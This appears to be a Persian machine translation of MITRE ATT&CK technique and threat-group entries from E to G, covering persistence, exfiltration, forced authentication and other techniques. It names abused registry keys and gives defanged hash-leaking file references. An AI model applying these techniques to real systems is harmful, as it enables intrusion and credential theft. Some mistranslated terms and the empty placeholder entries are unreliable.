دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های AppCert بارگذاری شده در فرآیندها ایجاد می شود، تداوم و یا امتیازات را افزایش دهند. کتابخانه‌های پیوند پویا ( DLLs) که در کلید رجیستری AppCertDLLs در زیر HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ مشخص شده‌اند در هر فرآیندی بارگیری می‌شوند که توابع برنامه‌نویسی برنامه‌نویسی کاربردی ( API) را فراخوانی می‌کند که همه جا توابع برنامه‌نویسی برنامه‌نویسی کاربردی ( API) را فراخوانی می‌کند. CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec از این مقدار می توان برای به دست آوردن امتیازات بالا با بارگیری و اجرای یک DLL مخرب در چارچوب فرآیندهای جداگانه در رایانه سوء استفاده کرد. DLL های مخرب AppCert همچنین ممکن است با فعال شدن مداوم توسط فعالیت API پایداری ایجاد کنند.

باعث اجرای رویداد: AppInit DLLs

Event Triggered Execution: AppInit DLLs

دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های AppInit بارگذاری شده در فرآیندها ایجاد می شود، تداوم و/یا امتیازات را افزایش دهند. کتابخانه‌های پیوند پویا (DLL) که در مقدار AppInit_DLLs در کلیدهای رجیستری زیر مشخص شده‌اند. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows dll را در هر فرآیندی که user32.dll بارگیری می کند، وارد کنید. در عمل این تقریباً همه برنامه ها است، زیرا user32.dll یک کتابخانه بسیار رایج است. مشابه Process Injection، این مقادیر را می توان برای به دست آوردن امتیازات بالا از طریق بارگیری و اجرای یک DLLمخرب در چارچوب فرآیندهای جداگانه در رایانه مورد سوء استفاده قرار داد. DLLهای مخرب AppInit همچنین ممکن است با فعال شدن مداوم توسط فعالیت API پایداری ایجاد کنند. عملکرد AppInit DLL در ویندوز 8 و نسخه‌های بعدی با فعال بودن راه‌اندازی امن غیرفعال می‌شود.

باعث اجرای رویداد: اپلیکیشن Shimming

Event Triggered Execution: Application Shimming

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط شیم های برنامه، تداوم و/یا امتیازات را افزایش دهند. زیرساخت / چارچوب سازگاری برنامه مایکروسافت ویندوز ( Application Shim) ایجاد شد تا با تغییر پایگاه کد سیستم عامل در طول زمان، امکان سازگاری با نرم افزار را فراهم کند. به عنوان مثال، ویژگی شیمینگ برنامه به توسعه دهندگان این امکان را می دهد تا برای برنامه های کاربردی (بدون بازنویسی کد) که برای ویندوز XP ایجاد شده اند، اصلاحاتی را اعمال کنند تا با ویندوز 10 کار کند. در چارچوب، شیم ها ایجاد می شوند تا به عنوان یک بافر بین برنامه (یا به طور خاص تر، جدول آدرس ورودی) و سیستم عامل ویندوز عمل کنند. هنگامی که یک برنامه اجرا می شود، به حافظه نهان شیم ارجاع داده می شود تا مشخص شود آیا برنامه به استفاده از پایگاه داده شیم (.sdb). نیاز دارد یا خیر. اگر چنین است، پایگاه داده شیم از hooking برای تغییر مسیر کد در صورت لزوم به منظور برقراری ارتباط با سیستم عامل استفاده می کند.

باعث اجرای رویداد: Image File Execution Options

Event Triggered Execution: Image File Execution Options Injection

دشمنان ممکن است با اجرای محتوای مخربی که توسط اشکال‌زدایی‌کننده‌های Image File Execution Options (IFEO) راه‌اندازی می‌شوند، تداوم داشته باشند و یا امتیازات را افزایش دهند. IFEO ها توسعه دهنده را قادر می سازند تا یک دیباگر را به یک برنامه متصل کند. هنگامی که یک فرآیند ایجاد می‌شود، یک اشکال‌زدای موجود در برنامه IFEO به نام برنامه اضافه می‌شود و عملاً فرآیند جدید را در زیر اشکال‌زدا راه‌اندازی می‌کند. IFEOها را می توان مستقیماً از طریق رجیستری یا در پرچم های جهانی از طریق ابزار GFlags تنظیم کرد. IFEO ها همچنین می توانند یک برنامه نظارتی دلخواه را فعال کنند تا زمانی که یک برنامه مشخص به صورت بی صدا خارج می شود (یعنی به خودی خود به طور پیش از موعد متوقف می شود یا یک فرآیند دوم غیر هسته‌ای). مشابه اشکال‌زداها، نظارت بر خروج بی‌صدا را می‌توان از طریق GFlags و یا با تغییر مستقیم مقادیر رجیستری خروجی IFEO.

باعث اجرای رویداد: نمایه PowerShell

Event Triggered Execution: PowerShell Profile

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط نمایه‌های PowerShell، تداوم داشته باشند و امتیازات را افزایش دهند. نمایه (profile.ps1) اسکریپتی است که هنگام شروع PowerShell اجرا می شود و می تواند به عنوان یک اسکریپت ورود به سیستم برای سفارشی کردن محیط های کاربر استفاده شود. PowerShell از چندین پروفایل بسته به کاربر یا برنامه میزبان پشتیبانی می کند. به عنوان مثال، می تواند پروفایل های مختلفی برای برنامه های میزبان PowerShell مانند کنسول PowerShell، PowerShell ISE یا Visual Studio Code وجود داشته باشد. یک مدیر همچنین می‌تواند نمایه‌ای را پیکربندی کند که برای همه کاربران و برنامه‌های میزبان در رایانه محلی اعمال شود. دشمنان ممکن است این نمایه‌ها را طوری تغییر دهند که شامل دستورات، توابع، ماژول‌ها و/یا درایوهای PowerShell دلخواه باشد تا پایداری داشته باشند. هر بار که کاربر یک جلسه PowerShell را باز می کند، اسکریپت اصلاح شده اجرا می شود مگر اینکه هنگام راه اندازی از پرچم -NoProfile استفاده شود. اگر یک اسکریپت در یک نمایه PowerShell توسط حسابی با امتیازات بالاتر، مانند یک سرپرست دامنه، بارگیری و اجرا شود، یک دشمن ممکن است بتواند امتیازات را افزایش دهد.

باعث اجرای رویداد: Emond

Event Triggered Execution: Emond

دشمنان ممکن است با اجرای محتوای مخربی که توسط Daemon مانیتور رویداد ( emond) راه اندازی شده است، پایداری و امتیازات را افزایش دهند. Emond یک Launch Daemon است که رویدادها را از سرویس های مختلف می پذیرد، آنها را از طریق یک موتور قوانین ساده اجرا می کند و اقدام می کند. emond باینری در /sbin/emond هر قاعده‌ای را از فهرست /etc/emond.d/rules/ بارگیری می‌کند و پس از وقوع یک رویداد مشخص، اقدام می‌کند. فایل های قانون در قالب plist هستند و نام، نوع رویداد و اقدامی که باید انجام شود را تعریف می کنند. برخی از نمونه‌های انواع رویداد شامل راه‌اندازی سیستم و احراز هویت کاربر است. نمونه هایی از اقدامات عبارتند از اجرای فرمان سیستم یا ارسال ایمیل. اگر فایلی در مسیر /private/var/db/emondClients که در فایل پیکربندی Launch Daemon در//System/Library/LaunchDaemons/com.apple.emond.plist مشخص شده است، وجود نداشته باشد، سرویس emond راه اندازی نمی شود. دشمنان ممکن است با نوشتن یک قانون برای اجرای دستورات زمانی که یک رویداد تعریف شده رخ می دهد، از این سرویس سوء استفاده کنند، مانند راه اندازی سیستم یا تأیید اعتبار کاربر. دشمنان همچنین ممکن است بتوانند امتیازات را از مدیر به روت افزایش دهند زیرا سرویس emond با امتیازات ریشه توسط سرویس Launch Daemon اجرا می شود.

اجرای رویداد: ربودن مدل شیء جزء

Event Triggered Execution: Component Object Model Hijacking

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط ارجاعات ربوده شده به اشیاء مدل شیء مؤلفه ( COM)پایداری را ایجاد کنند. COM یک سیستم در ویندوز برای فعال کردن تعامل بین اجزای نرم افزار از طریق سیستم عامل است. ارجاع به اشیاء مختلف COM در رجیستری ذخیره می شود. دشمنان می توانند از سیستم COM برای درج کد مخربی استفاده کنند که می تواند به جای نرم افزار قانونی از طریق ربودن مراجع و روابط COM به عنوان وسیله ای برای تداوم اجرا شود. ربودن یک شی COM نیاز به تغییر در رجیستری دارد تا مرجعی به یک جزء قانونی سیستم جایگزین شود که ممکن است باعث شود آن جزء هنگام اجرا کار نکند. هنگامی که آن جزء سیستم از طریق عملیات عادی سیستم اجرا می شود، کد حریف به جای آن اجرا می شود. یک دشمن احتمالاً اجسامی را می رباید که به قدر کافی استفاده می شوند تا سطح پایداری ثابتی داشته باشند، اما بعید است که عملکرد قابل توجهی را در سیستم خراب کند تا از بی ثباتی سیستم که می تواند منجر به شناسایی شود جلوگیری کند.

خدمات از راه دور خارجی

External Remote Services

دشمنان ممکن است از خدمات راه دور خارجی استفاده کنند تا در ابتدا به شبکه دسترسی پیدا کنند و/یا ادامه پیدا کنند. سرویس‌های راه دور مانند VPN، Citrix و سایر مکانیسم‌های دسترسی به کاربران اجازه می‌دهند تا از مکان‌های خارجی به منابع شبکه داخلی سازمانی متصل شوند. اغلب دروازه‌های سرویس راه دور وجود دارند که اتصالات و تأیید اعتبار را برای این سرویس‌ها مدیریت می‌کنند. خدماتی مانند Windows Remote Management و VNC نیز می توانند به صورت خارجی استفاده شوند. دسترسی به حساب‌های معتبر برای استفاده از این سرویس اغلب یک الزام است، که می‌توان آن را از طریق credential pharming یا با گرفتن اعتبار از کاربران پس از به خطر انداختن شبکه سازمانی به دست آورد. دسترسی به خدمات از راه دور ممکن است به عنوان یک مکانیسم دسترسی اضافی یا دائمی در طول یک عملیات استفاده شود. همچنین ممکن است از طریق یک سرویس در معرض دید که نیازی به احراز هویت ندارد، دسترسی حاصل شود. در محیط‌های کانتینری، این ممکن است شامل یک Docker API، سرور Kubernetes API، kubelet، یا برنامه وب مانند داشبورد Kubernetes باشد.

ماتریس سازمانی

Enterprise matrix

ماتریس سازمانی همه تاکتیک‌ها، تکنیک‌ها اصلی و تکنیک‌های فرعی را برای همه پلتفرم‌ها پوشش می‌دهد. با این حال، MITER همچنین ماتریس‌های مخصوص پلتفرم را ارائه می‌کند که زیرمجموعه تاکتیک‌ها، تکنیک‌های اصلی و تکنیک‌های فرعی را که برای یک پلتفرم خاص قابل اجرا هستند، برجسته می‌کند.

نرده های اعدام

Execution Guardrails

دشمنان ممکن است از حفاظ‌های اجرایی برای محدود کردن اجرا یا اقداماتی بر اساس شرایط خاص دشمن و محیطی که انتظار می‌رود روی هدف وجود داشته باشد، استفاده کنند. گاردریل‌ها تضمین می‌کنند که یک محموله فقط در برابر هدف مورد نظر اجرا می‌شود و آسیب‌های جانبی ناشی از کمپین دشمن را کاهش می‌دهد. مقادیری که یک دشمن می‌تواند در مورد یک سیستم یا محیط هدف برای استفاده به عنوان نرده‌های محافظ ارائه دهد، ممکن است شامل نام‌های اشتراک شبکه خاص، دستگاه‌های فیزیکی متصل، فایل‌ها، دامنه‌های پیوسته Active Directory (AD) و آدرس‌های IP محلی/خارجی باشد. نرده‌های محافظ می‌توانند برای جلوگیری از قرار گرفتن در معرض قابلیت‌ها در محیط‌هایی که قرار نیست در معرض خطر قرار گیرند یا در داخل آنها کار کنند، استفاده شوند. این استفاده از نرده‌های محافظ با Virtualization/Sandbox Evasion معمولی متمایز است. در حالی که استفاده از Virtualization/Sandbox Evasion ممکن است شامل بررسی مقادیر شناخته شده sandbox و ادامه اجرا فقط در صورت عدم تطابق باشد، استفاده از گاردریل مستلزم بررسی مقدار مورد انتظار برای هدف خاص است و فقط در صورت وجود چنین تطابقی، اجرا را ادامه می‌دهد.

بهره برداری برای فرار از دفاع

Exploitation for Defense Evasion

دشمنان ممکن است از آسیب پذیری سیستم یا برنامه برای دور زدن ویژگی های امنیتی سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. آسیب‌پذیری‌ها ممکن است در نرم‌افزار امنیتی دفاعی وجود داشته باشد که می‌توان از آنها برای غیرفعال کردن یا دور زدن آنها استفاده کرد. ممکن است دشمنان از طریق شناسایی از وجود نرم‌افزار امنیتی در یک محیط اطلاعات قبلی داشته باشند یا ممکن است در طول یا مدت کوتاهی پس از در معرض خطر قرار گرفتن سیستم برای کشف نرم‌افزار امنیتی، بررسی‌هایی را انجام دهند. نرم افزار امنیتی احتمالاً مستقیماً برای بهره برداری هدف قرار خواهد گرفت. نمونه‌هایی از نرم‌افزارهای آنتی‌ویروس وجود دارد که توسط گروه‌های تهدیدکننده دائمی برای جلوگیری از شناسایی هدف قرار می‌گیرند.

بهره برداری برای دسترسی به اعتبار

Exploitation for Credential Access

دشمنان ممکن است از آسیب‌پذیری‌های نرم‌افزار در تلاش برای جمع آوری اعتبار سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. مکانیسم های اعتبارسنجی و احراز هویت ممکن است برای بهره برداری توسط دشمنان به عنوان وسیله ای برای دستیابی به اعتبارنامه های مفید یا دور زدن فرآیند برای دسترسی به سیستم ها مورد هدف قرار گیرند. یکی از نمونه‌های آن MS14-068 است که Kerberos را هدف قرار می‌دهد و می‌تواند برای جعل بلیط‌های Kerberos با استفاده از مجوزهای کاربر دامنه استفاده شود. بهره برداری برای دسترسی به اعتبار نیز ممکن است منجر به افزایش امتیاز بسته به فرآیند مورد نظر یا اعتبار به دست آمده شود.

بهره برداری از خدمات از راه دور

Exploitation of Remote Services

دشمنان ممکن است از سرویس های راه دور برای دسترسی غیرمجاز به سیستم های داخلی یک بار در یک شبکه سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. یک هدف مشترک برای بهره برداری پس از سازش خدمات از راه دور، حرکت جانبی برای امکان دسترسی به یک سیستم راه دور است. یک دشمن ممکن است نیاز داشته باشد که آیا سیستم راه دور در یک وضعیت آسیب پذیر است یا خیر، که ممکن است از طریق اسکن سرویس شبکه یا سایر روش های کشف به دنبال نرم افزار رایج و آسیب پذیری که ممکن است در شبکه مستقر شده باشد، انجام شود، عدم وجود وصله های خاص که ممکن است نشان دهنده آن باشد. آسیب‌پذیری‌ها یا نرم‌افزار امنیتی که ممکن است برای شناسایی یا مهار بهره‌برداری از راه دور استفاده شود. سرورها احتمالاً یک هدف با ارزش برای بهره برداری از حرکت جانبی هستند، اما سیستم های نقطه پایانی نیز در صورت ایجاد مزیت یا دسترسی به منابع اضافی ممکن است در معرض خطر باشند. چندین آسیب‌پذیری شناخته شده در سرویس‌های رایج مانند SMB وRDP و همچنین برنامه‌هایی که ممکن است در شبکه‌های داخلی مانند MySQLو سرویس‌های وب سرور استفاده شوند، وجود دارد. بسته به سطح مجوزهای سرویس راه دور آسیب پذیر، یک دشمن ممکن است به بهره برداری برای افزایش امتیاز در نتیجه بهره برداری از حرکت جانبی نیز دست یابد.

مجموعه ایمیل

Email Collection

ممکن است دشمنان ایمیل کاربر را برای جمع آوری اطلاعات حساس مورد هدف قرار دهند. ایمیل ها ممکن است حاوی داده های حساس، از جمله اسرار تجاری یا اطلاعات شخصی باشد که می تواند برای دشمنان ارزشمند باشد. دشمنان می توانند ایمیل را از سرورهای پست الکترونیکی یا مشتریان جمع آوری یا ارسال کنند.

کانال رمزگذاری شده

Encrypted Channel

دشمنان ممکن است از یک الگوریتم رمزگذاری شناخته شده برای پنهان کردن فرمان و کنترل ترافیک به جای اتکا به هرگونه حفاظت ذاتی ارائه شده توسط یک پروتکل ارتباطی استفاده کنند. با وجود استفاده از یک الگوریتم ایمن، اگر کلیدهای مخفی در نمونه‌های بدافزار/فایل‌های پیکربندی کدگذاری شده و/یا تولید شوند، ممکن است این پیاده‌سازی‌ها در مقابل مهندسی معکوس آسیب‌پذیر باشند.

Exfiltration از طریق پروتکل جایگزین

Exfiltration Over Alternative Protocol

دشمنان ممکن است داده ها را از طریق پروتکلی متفاوت از کانال فرمان و کنترل موجود، به سرقت ببرند. داده ها همچنین ممکن است از سرور اصلی فرمان و کنترل به یک مکان شبکه جایگزین ارسال شوند. پروتکل های جایگزین عبارتند از FTP، SMTP، HTTP/S، DNS، SMB، یا هر پروتکل شبکه دیگری که به عنوان کانال فرمان و کنترل اصلی استفاده نمی شود. کانال‌های پروتکل مختلف نیز می‌توانند شامل سرویس‌های وب مانند ذخیره‌سازی ابری باشند. همچنین ممکن است دشمنان این کانال‌های جایگزین را رمزگذاری و/یا مبهم کنند. Exfiltration Over Alternative Protocol را می توان با استفاده از ابزارهای رایج سیستم عامل مختلف مانند Net/SMB یا FTP انجام داد. در macOS و Linux curl ممکن است برای فراخوانی پروتکل‌هایی مانند HTTP/S یا FTP/S برای استخراج داده‌ها از یک سیستم استفاده شود.

خروج از کانال C2

Exfiltration Over C2 Channel

دشمنان ممکن است داده ها را از طریق یک کانال فرمان و کنترل موجود به سرقت ببرند. داده های دزدیده شده با استفاده از همان پروتکل ارتباطات فرمان و کنترل در کانال ارتباطی معمولی کدگذاری می شوند.

نفوذ بیش از سایر رسانه های شبکه

Exfiltration Over Other Network Medium

دشمنان ممکن است سعی کنند داده ها را از طریق یک رسانه شبکه متفاوت از کانال فرمان و کنترل استخراج کنند. اگر شبکه فرمان و کنترل یک اتصال اینترنت سیمی باشد، دفع ممکن است به عنوان مثال از طریق اتصال WiFi، مودم، اتصال داده سلولی، بلوتوث یا کانال فرکانس رادیویی دیگر (RF) رخ دهد.اگر دشمنان دسترسی یا نزدیکی کافی داشته باشند، ممکن است این کار را انجام دهند، و ممکن است اتصال و همچنین کانال اصلی متصل به اینترنت ایمن یا محافظت نشود زیرا از طریق همان شبکه سازمانی هدایت نمی‌شود.

خروج از محیط فیزیکی

Exfiltration Over Physical Medium

دشمنان ممکن است سعی کنند از طریق یک رسانه فیزیکی، مانند درایو قابل جابجایی، داده ها را استخراج کنند. در شرایط خاص، مانند به خطر افتادن شبکه با شکاف هوا، نفوذ ممکن است از طریق یک رسانه فیزیکی یا دستگاه معرفی شده توسط کاربر رخ دهد. چنین رسانه ای می تواند یک هارد دیسک خارجی، درایو USB، تلفن همراه، پخش کننده MP3 یا سایر دستگاه های ذخیره سازی و پردازش قابل جابجایی باشد. رسانه فیزیکی یا دستگاه می تواند به عنوان نقطه خروج نهایی یا برای پرش بین سیستم های جدا شده استفاده شود

Exfiltration از طریق وب سرویس

Exfiltration Over Web Service

دشمنان ممکن است از یک سرویس وب خارجی موجود و قانونی برای استخراج داده ها به جای کانال فرمان و کنترل اصلی خود استفاده کنند. سرویس‌های وب محبوب که به عنوان مکانیزم نفوذ عمل می‌کنند، ممکن است به دلیل احتمال اینکه میزبان‌های داخل یک شبکه از قبل با آن‌ها ارتباط برقرار کرده باشند، پوشش قابل توجهی ارائه می‌دهند.

یک گروه مظنون به جاسوسی سایبری چینی

Elderwood

Elderwood یک گروه مظنون به جاسوسی سایبری چینی است که گزارش شده است که مسئول نفوذ گوگل در سال 2009 به نام عملیات شفق قطبی بوده است. این گروه سازمان های دفاعی، تولیدکنندگان زنجیره تامین، سازمان های حقوق بشر و غیردولتی ( NGO) و ارائه دهندگان خدمات فناوری اطلاعات را هدف قرار داده است.

یک گروه تهدید پیچیده است

Equation

Equation یک گروه تهدید پیچیده است که از چندین ابزار دسترسی از راه دور استفاده می کند. این گروه به استفاده از اکسپلویت‌های روز صفر معروف است و قابلیت بازنویسی میان‌افزار درایوهای دیسک سخت را توسعه داده است.

یک گروه تهدید با انگیزه مالی

Evilnum

Evilnum یک گروه تهدید با انگیزه مالی است که حداقل از سال 2018 فعال بوده است.

استخراج داده

Exfiltration

یک تعریف رایج استخراج داده، سرقت یا حذف یا جابجایی غیرمجاز هر داده از یک دستگاه است. استخراج داده ها معمولاً شامل سرقت اطلاعات از دستگاه های شخصی یا شرکتی مانند رایانه ها و تلفن های همراه از طریق روش های مختلف حمله سایبری توسط یک مجرم سایبری است.

حمله گنجاندن فایل

File Inclusion attack

حمله گنجاندن فایل برای فریب برنامه در معرض نمایش یا اجرای فایل‌ها در سرور استفاده می‌شود. این حملات معمولاً زمانی اتفاق می‌افتد که یک برنامه از مسیر یک فایل به عنوان ورودی استفاده می‌کند. اگر برنامه آن ورودی را قابل اعتماد تلقی کند، مهاجم می‌تواند از فایل محلی در یک عبارت شامل استفاده کند.

اصلاح مجوزهای فایل و دایرکتوری

File and Directory Permissions Modification

دشمنان ممکن است مجوزها/ ویژگی‌های فایل یا دایرکتوری را تغییر دهند تا از فهرست‌های کنترل دسترسی فرار کنند و به فایل‌های محافظت شده دسترسی پیدا کنند. مجوزهای فایل و دایرکتوری معمولاً توسط ACLهایی که توسط مالک فایل یا دایرکتوری پیکربندی شده اند یا کاربرانی با مجوزهای مناسب مدیریت می شوند. پیاده سازی فایل ها و دایرکتوری های ACL بر اساس پلتفرم متفاوت است، اما به طور کلی مشخص می کند که کدام کاربران یا گروه ها می توانند چه اقداماتی را انجام دهند (خواندن، نوشتن، اجرا و غیره). تغییرات ممکن است شامل تغییر حقوق دسترسی خاص باشد، که ممکن است نیاز به مالکیت یک فایل یا فهرست و/یا مجوزهای بالاتر بسته به مجوزهای موجود فایل یا فهرست داشته باشد. این ممکن است فعالیت های مخربی مانند اصلاح، جایگزینی یا حذف فایل ها یا دایرکتوری های خاص را فعال کند. اصلاحات خاص فایل و دایرکتوری ممکن است برای بسیاری از تکنیک‌ها یک مرحله ضروری باشد، مانند ایجاد Persistence از طریق ویژگی‌های دسترسی، اسکریپت‌های راه‌اندازی یا ورود به سیستم، اصلاح پیکربندی پوسته یونیکس، یا آلوده کردن/ربایش فایل‌های باینری/پیکربندی ابزاری دیگر از طریق Hijack Execution Flow.

احراز هویت اجباری

Forced Authentication

دشمنان ممکن است با استناد یا وادار کردن کاربر به ارائه خودکار اطلاعات احراز هویت از طریق مکانیزمی که در آن می توانند رهگیری کنند، اطلاعات اعتبار جمع آوری کنند. پروتکل Server Message Block (SMB) معمولاً در شبکه های ویندوز برای احراز هویت و ارتباط بین سیستم ها برای دسترسی به منابع و اشتراک گذاری فایل استفاده می شود. هنگامی که یک سیستم ویندوز تلاش می کند به یک منبع SMB متصل شود، به طور خودکار تلاش می کند تا اطلاعات اعتبار کاربر فعلی را به سیستم راه دور تأیید و ارسال کند. این رفتار در محیط های سازمانی معمول است به طوری که کاربران نیازی به وارد کردن اعتبار برای دسترسی به منابع شبکه ندارند. نگارش و نسخه سازی توزیع شده وب ( WebDAV) نیز معمولاً توسط سیستم های ویندوز به عنوان یک پروتکل پشتیبان در زمانی که SMB مسدود شده یا از کار می افتد استفاده می شود. WebDAV توسعه HTTP است و معمولاً روی پورت های 80 و 443 TCP کار می کند. دشمنان ممکن است از این رفتار برای دسترسی به هش حساب کاربری از طریق احراز هویت اجباری SMB/WebDAV استفاده کنند. یک حریف می‌تواند پیوستی را از طریق spearphishing برای کاربر ارسال کند که حاوی پیوند منبع به سرور خارجی کنترل‌شده توسط دشمن است (یعنی تزریق الگو)، یا یک فایل ساخته‌شده خاص را در مسیر پیمایش حساب‌های دارای امتیاز قرار دهد (مثلاً فایل SCF. که روی دسک‌تاپ قرار می‌گیرد. ) یا روی اشتراکی که برای عموم قابل دسترسی است تا قربانی(ها) به آن دسترسی داشته باشند. هنگامی که سیستم کاربر به منبع نامعتبر دسترسی پیدا می کند، احراز هویت را انجام می دهد و اطلاعاتی از جمله اعتبار هش شده کاربر را از طریق SMB به سرور کنترل شده توسط دشمن ارسال می کند. با دسترسی به هش اعتبار، یک دشمن می‌تواند کرک کردن Brute Force را برای دسترسی به اعتبار متن ساده انجام دهد. چندین راه مختلف وجود دارد که ممکن است این اتفاق بیفتد. برخی از ویژگی های استفاده در طبیعت عبارتند از: یک پیوست spearphishing حاوی یک سند با منبعی که به طور خودکار هنگام باز شدن سند بارگیری می شود (به عنوان مثال تزریق الگو). این سند می‌تواند شامل درخواستی شبیه به: file[:]//[remote address]/Normal.dotm باشد تا درخواست SMB را فعال کند. یک فایل .LNK یا .SCFاصلاح شده با نام فایل نماد به یک مرجع خارجی مانند: \[remote address]\pic.png که سیستم را مجبور می‌کند منبع را بارگیری کند وقتی نماد برای جمع‌آوری مکرر اعتبارنامه‌ها ارائه می‌شود.

جعل اعتبار وب

Forge Web Credentials

دشمنان ممکن است اطلاعات اعتباری را جعل کنند که می تواند برای دسترسی به برنامه های کاربردی وب یا خدمات اینترنتی استفاده شود. برنامه‌ها و سرویس‌های وب (مستقر شده در محیط‌های SaaS ابری یا سرورهای داخلی) اغلب از کوکی‌های جلسه، نشانه‌ها یا سایر مواد برای احراز هویت و مجوز دسترسی کاربر استفاده می‌کنند. دشمنان ممکن است این مواد اعتباری را برای دسترسی به منابع وب تولید کنند. این با Steal Web Session Cookie، Steal Application Access Token و سایر رفتارهای مشابه متفاوت است، زیرا اعتبارنامه ها جدید هستند و توسط دشمن جعل شده اند، به جای دزدیده شدن یا رهگیری از کاربران قانونی. تولید اعتبارهای وب اغلب به مقادیر مخفی مانند رمز عبور، کلیدهای خصوصی یا سایر مقادیر اولیه رمزنگاری نیاز دارد. پس از جعل، دشمنان ممکن است از این اعتبارنامه‌های وب برای دسترسی به منابع استفاده کنند (مثلاً از مواد احراز هویت جایگزین استفاده کنید)، که ممکن است مکانیسم‌های حفاظتی چندعاملی و دیگر احراز هویت را دور بزند.

کشف فایل و دایرکتوری

File and Directory Discovery

دشمنان ممکن است فایل‌ها و دایرکتوری‌ها را شمارش کنند یا ممکن است در مکان‌های خاصی از اشتراک‌گذاری میزبان یا شبکه برای اطلاعات خاصی در یک سیستم فایل جستجو کنند. دشمنان ممکن است از اطلاعات File and Directory Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. برای به دست آوردن این اطلاعات می توان از بسیاری از ابزارهای پوسته فرمان استفاده کرد. مثالها عبارتند از dir، tree، ls، find و locate. همچنین ممکن است از ابزارهای سفارشی برای جمع آوری اطلاعات فایل و فهرست و تعامل با Native API استفاده شود.

کانال های بازگشتی

Fallback Channels

اگر کانال اصلی در معرض خطر یا غیرقابل دسترسی باشد، ممکن است دشمنان از کانال‌های ارتباطی جایگزین یا جایگزین استفاده کنند تا فرمان و کنترل قابل اعتماد را حفظ کنند و از آستانه انتقال داده جلوگیری کنند.

خرابی سیستم عامل

Firmware Corruption

دشمنان ممکن است محتویات حافظه فلش بایوس سیستم یا سایر سیستم عامل‌ها را در دستگاه‌های متصل به سیستم بازنویسی یا خراب کنند تا آنها را غیرقابل اجرا یا راه‌اندازی نکنند. سفت‌افزار نرم‌افزاری است که از حافظه غیرفرار روی دستگاه‌های سخت‌افزاری بارگذاری و اجرا می‌شود تا عملکرد دستگاه را مقداردهی اولیه و مدیریت کند. این دستگاه ها می توانند شامل مادربرد، هارد دیسک یا کارت گرافیک باشند.

یک گروه تهدید است

Ferocious Kitten

Ferocious Kitten یک گروه تهدید است که عمدتاً از سال 2015، افراد فارسی زبان را در ایران هدف قرار داده است.

یک بازیگر تهدید با ارتباط مشکوک با دولت ایران

Fox Kitten

فاکس کیتن یک بازیگر تهدید با ارتباط مشکوک با دولت ایران است که حداقل از سال 2017 علیه نهادهایی در خاورمیانه، شمال آفریقا، اروپا، استرالیا و آمریکای شمالی فعال بوده است. Fox Kitten چندین بخش صنعتی از جمله نفت و گاز، فناوری، دولت، دفاع، مراقبت های بهداشتی، تولید و مهندسی را هدف قرار داده است.

فرانکشتاین

Frankenstein

فرانکشتاین کمپینی است که بین ژانویه و آوریل 2019 توسط عوامل تهدید ناشناس انجام شد. نام کمپین از توانایی بازیگران در کنار هم قرار دادن چندین مؤلفه نامرتبط می آید.

معنی فارسی

Gain Information

توضیح

معنی فارسی

Gain Privileges

توضیح

جمع‌آوری اطلاعات میزبان قربانی

Gather Victim Host Information

دشمنان ممکن است اطلاعاتی در مورد میزبان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به میزبان ممکن است شامل جزئیات مختلفی از جمله داده‌های اداری (مانند: نام، IP اختصاصی، عملکرد و غیره) و همچنین مشخصات مربوط به پیکربندی آن (مانند: سیستم عامل، زبان و غیره) باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع‌آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به میزبان نیز ممکن است به صورت آنلاین یا به وسیله سایر مجموعه داده‌های در دسترس (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/دامنه‌های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/یا دسترسی اولیه (مانند: مصالحه زنجیره تامین) نشان دهد.

جمع‌آوری اطلاعات میزبان قربانی: سخت افزار

Gather Victim Host Information: Hardware

